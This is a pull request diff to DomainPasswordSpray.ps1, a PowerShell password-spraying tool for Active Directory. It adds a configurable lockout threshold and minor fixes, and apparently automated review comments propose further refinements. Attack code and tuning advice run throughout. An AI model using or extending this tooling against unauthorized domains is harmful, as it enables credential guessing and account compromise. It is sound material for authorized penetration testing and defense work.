Added 'MinAttemptsUntilLockout' parameter + bugfix #26

Open
wants to merge 4 commits into
base: master
43 changes: 31 additions & 12 deletions DomainPasswordSpray.ps1
Expand Up @@ -46,6 +46,10 @@ function Invoke-DomainPasswordSpray{

For each user, will try that user's name as their password

.PARAMETER MinAttemptsUntilLockout

Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!).

.EXAMPLE

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016
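Review bot: The new `.PARAMETER MinAttemptsUntilLockout` help text says accounts with "more than this number" of attempts left are kept, but the filter in `Get-DomainUserList` compares with `-ge $MinAttemptsUntilLockout`, so an account with exactly this number of attempts left is kept as well. Reword to "at least this number" so the documented threshold matches the comparison; the parenthetical about a value of 1 then follows directly from the wording.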
Expand Down Expand Up @@ -109,7 +113,10 @@ function Invoke-DomainPasswordSpray{
$Delay=0,

[Parameter(Position = 9, Mandatory = $false)]
$Jitter=0
$Jitter=0,

[Parameter(Position = 10, Mandatory = $false)]
$MinAttemptsUntilLockout = 2

)

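Review bot: `$MinAttemptsUntilLockout = 2` is declared without a type or validation, so a non-numeric or zero value binds without error and only surfaces later in the `-ge` comparison. Declaring it as `[int]` with `[ValidateRange(1, [int]::MaxValue)]` would reject such input at parameter binding, which matters for a setting whose whole purpose is to keep accounts from being locked out.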
Expand Down Expand Up @@ -155,7 +162,7 @@ function Invoke-DomainPasswordSpray{

if ($UserList -eq "")
{
$UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter
$UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter -MinAttemptsUntilLockout $MinAttemptsUntilLockout
}
else
{
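Review bot: `-MinAttemptsUntilLockout` is forwarded to `Get-DomainUserList` only inside `if ($UserList -eq "")`, so when a user list is supplied the value appears to have no effect. The `else` branch is not visible in this hunk; if it does not apply the threshold, say so in the parameter help or print a notice when both `-UserList` and `-MinAttemptsUntilLockout` are given, so the operator does not assume a lockout safeguard that is not active.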
Expand All @@ -174,18 +181,16 @@ function Invoke-DomainPasswordSpray{
}

}

$observation_window = Get-ObservationWindow $CurrentDomain

Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes."

if ($Passwords.count -gt 1)
{
if ($Passwords.count -gt 1) {
Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!"
Write-Host "[*] Setting a $observation_window minute wait in between sprays."
}

$observation_window = Get-ObservationWindow $CurrentDomain

Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes."
Write-Host "[*] Setting a $observation_window minute wait in between sprays."

# if no force flag is set we will ask if the user is sure they want to spray
if (!$Force)
{
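Review bot: The rewritten `if ($Passwords.count -gt 1) {` puts the opening brace on the same line, while the surrounding code (`if ($UserList -eq "")`, `if (!$Force)`) keeps it on its own line. Keep the file's existing brace style so this hunk is limited to moving the `Get-ObservationWindow` call above the first use of `$observation_window`, and mention that reordering in the commit message since it is a separate fix from the new parameter.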
Expand Down Expand Up @@ -281,6 +286,10 @@ function Get-DomainUserList

Custom LDAP filter for users, e.g. "(description=*admin*)"

.PARAMETER MinAttemptsUntilLockout

Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!).

.EXAMPLE

PS C:\> Get-DomainUserList
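Review bot: The help text added here does not mention that the threshold is combined with the observation window by `-or` in the filter (`($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout)`). An account whose last failed logon is older than the observation window is included regardless of this value; document that, and that the check belongs to `-RemovePotentialLockouts`, so the parameter is not read as an absolute guarantee.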
Expand Down Expand Up @@ -313,9 +322,16 @@ function Get-DomainUserList

[Parameter(Position = 3, Mandatory = $false)]
[string]
$Filter
$Filter,

[Parameter(Position = 4, Mandatory = $false)]
$MinAttemptsUntilLockout = 2
)

if($MinAttemptsUntilLockout -eq 1) {
Write-Host -ForegroundColor Red "[*] Warning! 'MinAttemptsUntilLockout' set to 1. This means the attack could target accounts which will be locked upon 1 bad attempt (the attempt you are about to perform)!"
}

try
{
if ($Domain -ne "")
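Review bot: The guard `if($MinAttemptsUntilLockout -eq 1)` warns only for exactly 1, so 0 or a negative value passes silently even though the later `-ge` comparison would then accept every account. Use `-le 1` (or reject values below 1 outright), and prefer `Write-Warning` over `Write-Host -ForegroundColor Red` so the message goes to the warning stream and can be captured or escalated with `-WarningAction`.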
Expand Down Expand Up @@ -455,7 +471,7 @@ function Get-DomainUserList
# if there is more than 1 attempt left before a user locks out
# or if the time since the last failed login is greater than the domain
# observation window add user to spray list
if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -gt 1))
if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout))
{
$UserListArray += $samaccountname
}
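Review bot: The comment above the condition still reads "if there is more than 1 attempt left before a user locks out", which no longer describes `$attemptsuntillockout -ge $MinAttemptsUntilLockout`. Update it to refer to the configurable threshold. With the default of 2 the new `-ge 2` is equivalent to the old `-gt 1`, which is worth stating in the comment so the change in operator is not mistaken for a change in default behaviour.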
Expand Down Expand Up @@ -503,7 +519,10 @@ function Invoke-SpraySinglePassword
$count = $UserListArray.count
Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"
$curr_user = 0
Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
if ($OutFile -ne "")
{
Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
}
$RandNo = New-Object System.Random

foreach ($User in $UserListArray)
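Review bot: The new guard `if ($OutFile -ne "")` still prints the "Writing successes" message when `$OutFile` is `$null`, because `$null -ne ""` evaluates to true. The parameter declaration is not in this hunk, so if `$OutFile` is not typed as `[string]`, test with `[string]::IsNullOrEmpty($OutFile)` instead. This fix is also unrelated to `MinAttemptsUntilLockout` and would be easier to review and revert as its own commit.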